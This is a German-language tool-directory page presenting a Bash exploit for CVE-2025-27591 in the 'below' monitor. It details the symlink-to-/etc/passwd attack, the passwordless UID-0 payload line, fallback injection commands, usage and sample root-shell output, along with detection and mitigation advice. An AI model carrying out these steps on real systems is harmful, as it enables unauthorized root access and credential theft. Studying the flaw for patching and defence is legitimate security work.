Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — Ein Bash-basierter Privilegieneskalations-Exploit, der auf das Systemleistungs-Überwachungstool `below` abzielt. Dieser überarbeitete Exploit nutzt eine Symlink-Schwachstelle im Protokollierungsmechanismus, um einen Root-Benutzer in die `/etc/passwd`-Datei einzuschleusen, und erlangt so vollständigen Root-Zugriff. | Kitploit
Tools/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungBinary-Exploitation
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

2vor 9 MonatenNoch nicht geprüft

Ein Bash-basierter Privilegieneskalations-Exploit, der auf das Systemleistungs-Überwachungstool `below` abzielt. Dieser überarbeitete Exploit nutzt eine Symlink-Schwachstelle im Protokollierungsmechanismus, um einen Root-Benutzer in die `/etc/passwd`-Datei einzuschleusen, und erlangt so vollständigen Root-Zugriff.

Teilen

Buy me a knowledge

CVE-2025-27591 Exploit - Below-Logger-Symlink-Angriff

Ein Bash-basierter Privilege-Escalation-Exploit, der auf das Systemleistungsüberwachungstool below abzielt. Dieser überarbeitete Exploit nutzt eine Symlink-Schwachstelle im Protokollierungsmechanismus aus, um einen Root-Benutzer in /etc/passwd einzuschleusen und so vollständigen Root-Zugriff zu erlangen.

Credits

Entdeckt und gemeldet von Matthias Gerstner @ SUSE - Sicherheitshinweis

Details zur Schwachstelle

  • CVE: CVE-2025-27591
  • Betroffene Komponente: /usr/bin/below (Facebooks Systemleistungsmonitor)
  • Betroffene Versionen: below-Versionen mit weltweit beschreibbaren Log-Verzeichnissen
  • Schwachstellentyp: Symlink-Angriff / Privilege Escalation
  • Angriffsvektor: /var/log/below/error_root.log → /etc/passwd
  • CVSS-Score: Hoch (Privilege Escalation zu Root)

Übersicht

Das Überwachungstool below protokolliert Fehler in /var/log/below/error_root.log, wenn es mit erhöhten Rechten ausgeführt wird. Wenn das Log-Verzeichnis weltweit beschreibbar ist, kann ein Angreifer Folgendes tun:

  1. Einen symbolischen Link von error_root.log auf /etc/passwd erstellen
  2. Den Befehl below record auslösen, um Fehlermeldungen auf den Symlink zu schreiben
  3. Manuell einen bösartigen Benutzereintrag mit UID=0 (Root-Rechte) einfügen
  4. Eine Root-Shell mit dem neu erstellten Benutzer starten

Dieser Exploit automatisiert den gesamten Prozess mit intelligenten Fallback-Mechanismen, um verschiedene Systemkonfigurationen zu handhaben.

Exploit-Ablaufdiagramm

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Get Username from User]
    B --> C{Check /var/log/below<br/>World-Writable?}
    C -->|No| D[Exit: Not Vulnerable]
    C -->|Yes| E[Remove Existing error_root.log]
    E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
    F --> G{Symlink Created<br/>Successfully?}
    G -->|No| D
    G -->|Yes| H[Execute: sudo below record]
    H --> I[Wait 3 seconds for logging]
    I --> J[Kill below process]
    J --> K{Payload in<br/>/etc/passwd?}
    K -->|Yes| M[Success Path]
    K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
    L --> N{Manual Injection<br/>Success?}
    N -->|No| O[Try Fallback:<br/>sudo tee -a]
    N -->|Yes| M
    O --> P{Fallback<br/>Success?}
    P -->|No| D
    P -->|Yes| M
    M --> Q[Verify Payload in /etc/passwd]
    Q --> R[Disable Cleanup Trap]
    R --> S[Execute: su username]
    S --> T[Root Shell Obtained]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

Technische Details

Exploit-Schritte

  1. Vorprüfphase

    • Überprüfen, ob das Verzeichnis /var/log/below existiert
    • Prüfen, ob das Verzeichnis weltweit beschreibbare Berechtigungen hat (o+w)
    • Testen der Symlink-Erstellungsfähigkeit
  2. Einrichtungsphase

    • Entfernen einer vorhandenen error_root.log-Datei
    • Erstellen eines symbolischen Links: /var/log/below/error_root.log → /etc/passwd
    • Überprüfen, ob der Symlink auf das richtige Ziel zeigt
  3. Injektionsphase (Primäre Methode)

    • Ausführen von sudo below record im Hintergrund
    • Prozess für 3 Sekunden laufen lassen, um die Fehlerprotokollierung auszulösen
    • Prozess beenden, um kontinuierliche Protokollierung zu verhindern
    • Prüfen, ob Fehlermeldungen /etc/passwd auf nützliche Weise beschädigt haben
  4. Injektionsphase (Fallback-Methoden)

    • Methode 1: Direktes Anhängen über Symlink (echo >> symlink)
    • Methode 2: Verwendung von sudo mit tee (sudo tee -a)
  5. Shell-Startphase

Payload-Struktur

Der injizierte /etc/passwd-Eintrag folgt diesem Format:

root@kitploit:~
username::0:0:username:/root:/bin/bash

Aufschlüsselung der Felder:

  • username: Vom Benutzer bereitgestellter Benutzername (Standard: "0xdtc")
  • ::: Leeres Passwortfeld (kein Passwort erforderlich)
  • 0:0: UID=0, GID=0 (Root-Rechte)
  • username: GECOS-Feld (Benutzerbeschreibung)
  • /root: Home-Verzeichnis
  • /bin/bash: Anmelde-Shell

Voraussetzungen

  • Zielsystem, das die anfällige below-Binärdatei ausführt
  • Das Verzeichnis /var/log/below muss weltweit beschreibbar sein
  • Der Benutzer muss sudo-Zugriff haben, um below record auszuführen
  • Bash-Shell-Umgebung

Verwendung

Grundlegende Ausführung

root@kitploit:~
# Make script executable
chmod +x CVE-2025-27591

# Run the exploit
./CVE-2025-27591

Interaktive Eingabeaufforderungen

root@kitploit:~
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): myuser
[+] Using username: myuser

Beispielausgabe

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): 0xdtc
[+] Using username: 0xdtc

[*] Checking for CVE-2025-27591 vulnerability
[+] /var/log/below is world-writable
[*] Testing symlink creation
[+] Symlink test successful
[+] Target is vulnerable

[*] Starting exploitation
[+] Wrote payload to /tmp/exploit_payload
[*] Creating symlink: /var/log/below/error_root.log -> /etc/passwd
[+] Symlink created
[*] Executing 'sudo below record' to trigger logging
[*] Started 'below record' with PID: 12345
[*] Checking if payload was written
[*] Attempting manual injection
[*] Appending payload to /etc/passwd via symlink
[+] Payload appended
[+] Exploitation completed! Payload is in /etc/passwd
[*] Spawning root shell via 'su 0xdtc'
[*] Password should be empty, just press Enter

root@kali:/tmp# whoami
root

Funktionen

Intelligente Behandlung von Blockaden

Das Skript enthält mehrere Fallback-Mechanismen, um verschiedene Systemkonfigurationen zu handhaben:

  1. Behandlung vorhandener Dateien

    • Automatisches Erkennen und Entfernen vorhandener Log-Dateien
    • Behandlung sowohl regulärer Dateien als auch vorhandener Symlinks
    • Validierung des Symlink-Ziels vor dem Fortfahren
  2. Mehrere Injektionsmethoden

    • Primär: Auslösen durch below record-Fehlerprotokollierung
    • Fallback 1: Direktes Anhängen an den Symlink
    • Fallback 2: Privilegierter Schreibzugriff mittels sudo tee
  3. Prozessverwaltung

    • Automatisches Beenden hängender below-Prozesse
    • Verhindert Ressourcenerschöpfung
    • Handhabt Prozessbereinigung bei Fehlern
  4. Erneute Ausführungserkennung

    • Prüft, ob der Payload bereits in /etc/passwd existiert
    • Überspringt die Ausnutzung, wenn der Benutzer bereits erstellt wurde
    • Startet bei erneuter Ausführung direkt eine Shell

Code-Qualitätsmerkmale

  • Umfassende Kommentare: Jede Funktion und jeder kritische Schritt dokumentiert
  • Abschnittsüberschriften: Code in logische Abschnitte gegliedert
  • Fehlerbehandlung: Korrekte Fehlerprüfung und Benutzerrückmeldung
  • Sauberer Ausstieg: Trap-Handler für ordentliche Bereinigung bei Fehlern
  • Minimale Abhängigkeiten: Reines Bash mit standardmäßigen Unix-Werkzeugen

Dateistruktur

root@kitploit:~
.
├── CVE-2025-27591           # Main exploitation script
├── README.md           # This documentation
└── /tmp/exploit_payload # Temporary payload file (created at runtime)

Überprüfung

Nach erfolgreicher Ausnutzung den Root-Zugriff überprüfen:

root@kitploit:~
# Check current user
root@target:/tmp# whoami
root

# Check user ID and groups
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# Verify user in /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# Read root-only files
root@target:/tmp# cat /etc/shadow
[... shadow file contents ...]

Bereinigung

Wenn Sie den bösartigen Benutzer nach dem Testen entfernen müssen:

root@kitploit:~
# Remove the injected user from /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd

# Remove any leftover symlinks
rm -f /var/log/below/error_root.log

Ersetzen Sie username durch den tatsächlich verwendeten Benutzernamen während der Ausnutzung.

Erkennung und Abhilfe

Erkennungsmethoden

  1. Dateiintegritätsüberwachung

    root@kitploit:~
    # Monitor /etc/passwd for unauthorized changes
    aide --check
    
  2. Symlink-Erkennung

    root@kitploit:~
    # Check for suspicious symlinks in log directories
    find /var/log -type l -ls
    
  3. Prüfprotokolle

    root@kitploit:~
    # Check for suspicious sudo usage
    grep "below record" /var/log/auth.log
    

Abhilfestrategien

  1. Verzeichnisberechtigungen korrigieren

    root@kitploit:~
    # Remove world-writable permission from log directory
    sudo chmod 755 /var/log/below
    
  2. AppArmor/SELinux-Richtlinien

    • Implementieren von obligatorischen Zugriffskontrollen
    • Einschränken der Dateischreiborte der below-Binärdatei
  3. Below aktualisieren

    • Sicherheitspatches von Facebook/Meta anwenden
    • Paketmanager-Updates verwenden
  4. Überwachen von /etc/passwd

    • Dateiintegritätsüberwachung einrichten (AIDE, Tripwire)
    • Warnung bei Hinzufügung von Benutzern mit UID=0

Rechtlicher Haftungsausschluss

Dieser Exploit ist nur für Bildungszwecke und autorisierte Penetrationstests bestimmt.

Der unbefugte Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, für die Sie eine ausdrückliche Genehmigung zur Durchführung von Sicherheitstests haben. Der/die Autor(en) übernehmen keine Haftung für Missbrauch dieses Tools.

Durch die Nutzung dieses Exploits bestätigen Sie, dass Sie:

  • Über die ordnungsgemäße Autorisierung zum Testen des Zielsystems verfügen
  • Die geltenden Gesetze und Vorschriften verstehen
  • Die volle Verantwortung für Ihre Handlungen übernehmen

Repository: https://github.com/0xDTC/ Autor: Divine Clown (0xDTC) Lizenz: Nur für Bildungszwecke Zuletzt aktualisiert: 2025-11-13

Tool herunterladen
  • Überprüfen, ob der bösartige Benutzer in /etc/passwd existiert
  • Deaktivieren der Cleanup-Traps, um die Entfernung zu verhindern
  • Ausführen von su <benutzername>, um eine Root-Shell zu erhalten